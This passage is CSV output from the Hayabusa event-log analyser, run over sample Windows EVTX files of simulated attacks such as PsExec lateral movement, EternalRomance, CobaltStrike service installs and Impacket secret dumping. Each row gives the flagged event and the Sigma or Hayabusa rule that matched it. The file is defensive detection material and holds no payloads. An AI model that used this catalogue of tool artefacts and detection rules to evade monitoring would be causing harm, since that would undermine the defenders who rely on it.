0x1375fbd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 
10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: PSEXESVC.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: PSEXESVC.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.347 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56662 : LogonID: 0x1375fd8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56663 : LogonID: 0x1375ff5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin 
Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56664 : LogonID: 0x1376003,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.360 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56666 : LogonID: 0x1376020,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.362 +09:00,srvdefender01.offsec.lan,4674,critical,SCM Database Privileged Operation,,rules/sigma/builtin/security/win_scm_database_privileged_operation.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec 
remote execution + admin share.evtx" -2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: cmd.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: cmd.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.529 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 22:30:00.589 +09:00,-,-,low,Rare Schtasks Creations,[condition] 
count() by TaskName < 5 in timeframe [result] count:1 TaskName:\\eviltask timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- -2021-04-21 23:56:41.780 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:41.786 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx -2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:41.818 
+09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx -2021-04-21 23:56:41.897 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service 
Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx -2021-04-22 17:50:53.614 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: 0Konuy9q8HtkWeKS : IP Address: 10.23.123.11 : Port: 41747 : LogonID: 
0x74872,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$ : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: FS03VULN$ : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.796 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$ : Share Name: \\*\IPC$ : Share Path: : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60163 : LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:06.539 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:06.554 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60163 : LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:19.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:19.291 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:22.992 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: 
admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:22.994 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec 
(GLOBAL).evtx" -2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.042 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.060 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.171 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 18:00:09.959 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60285 : LogonID: 
0xb3084,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60232 : LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 50078 : LogonID: 
0xb32cb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:14.421 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\BTeHLZkJ.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\NMdzZfem.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 